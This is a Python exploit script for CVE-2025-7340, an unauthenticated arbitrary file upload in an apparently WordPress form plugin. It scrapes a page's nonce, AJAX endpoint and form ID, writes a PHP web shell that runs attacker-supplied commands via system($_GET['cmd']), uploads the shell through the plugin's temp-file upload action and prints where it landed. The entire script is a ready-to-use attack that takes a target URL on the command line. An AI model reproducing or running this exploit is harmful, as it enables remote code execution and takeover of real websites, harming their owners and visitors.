import re import requests import argparse import time from colorama import init, Fore, Style # By : Nxploited (Khaled_alenazi) init(autoreset=True) class Nxploited: def __init__(self, target_url): self.target_url = target_url.rstrip("/") self.session = requests.Session() self.session.verify = False requests.packages.urllib3.disable_warnings() self.session.headers.update({ "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome Safari" }) self.nonce = None self.ajax_url = None self.form_id = None def run(self): print(Fore.CYAN + "Starting exploit against target...") time.sleep(1) self.fetch_target_page() self.extract_parameters() self.generate_shell() self.upload_shell() def fetch_target_page(self): print(Fore.YELLOW + "Fetching target page...") response = self.session.get(self.target_url) if response.status_code != 200: raise Exception("Failed to fetch target page") self.page_content = response.text def extract_parameters(self): print(Fore.YELLOW + "Extracting parameters...") time.sleep(0.8) self.nonce = self.extract_nonce() self.ajax_url = self.extract_ajax_url() self.form_id = self.extract_form_id() self.print_info("Extracted Nonce", self.nonce, Fore.GREEN) time.sleep(0.3) self.print_info("AJAX Endpoint", self.ajax_url, Fore.GREEN) time.sleep(0.3) self.print_info("Form ID", self.form_id, Fore.GREEN) if not all([self.nonce, self.ajax_url, self.form_id]): raise Exception("Missing required parameters") def extract_nonce(self): match = re.search(r'"nonce":"([a-f0-9]+)"', self.page_content) return match.group(1) if match else None def extract_ajax_url(self): match = re.search(r'"ajaxurl":"(http[^"]+)"', self.page_content) return match.group(1).replace("\\/", "/") if match else None def extract_form_id(self): match = re.search(r']+data-form-id=["\']?(\d+)', self.page_content) return match.group(1) if match else None def generate_shell(self): print(Fore.YELLOW + "Generating webshell...") shell_code = """"; if(isset($_GET['cmd'])) { echo "

";
    system($_GET['cmd']);
    echo "

"; } ?>""" with open("shell.php", "w") as f: f.write(shell_code) def upload_shell(self): print(Fore.YELLOW + "Uploading shell, please wait...") time.sleep(1) files = { "action": (None, "ht_form_temp_file_upload"), "_wpnonce": (None, self.nonce), "form_id": (None, self.form_id), "ht_form_file": ("shell.php", open("shell.php", "rb"), "application/x-php") } response = self.session.post(self.ajax_url, files=files) result = response.json() if result.get("success"): file_id = result["data"].get("file_id", "") shell_path = f"wp-content/uploads/ht_form/temp/{file_id}" print(Fore.GREEN + Style.BRIGHT + "\n[+] Exploit Successfully!\n") Nxploited.print_info("Go to", shell_path, Fore.MAGENTA + Style.BRIGHT) print(Fore.CYAN + "\nExploit by: Khaled Alenazi (Nxploited) - GitHub: https://github.com/Nxploited\n") else: print(Fore.RED + "Upload failed or unexpected response") @staticmethod def print_info(label, value, color=Fore.WHITE): print(f"{color}{label}: {value}") def main(): parser = argparse.ArgumentParser( description="Exploit for CVE-2025-7340 - Unauthenticated Arbitrary File Upload | by Khaled Alenazi (Nxploited)" ) parser.add_argument("-u", "--url", required=True, help="Target URL e.g http(s)://target.com") args = parser.parse_args() exploit = Nxploited(args.url) try: exploit.run() except Exception as e: print(Fore.RED + f"Error: {e}") if __name__ == "__main__": main()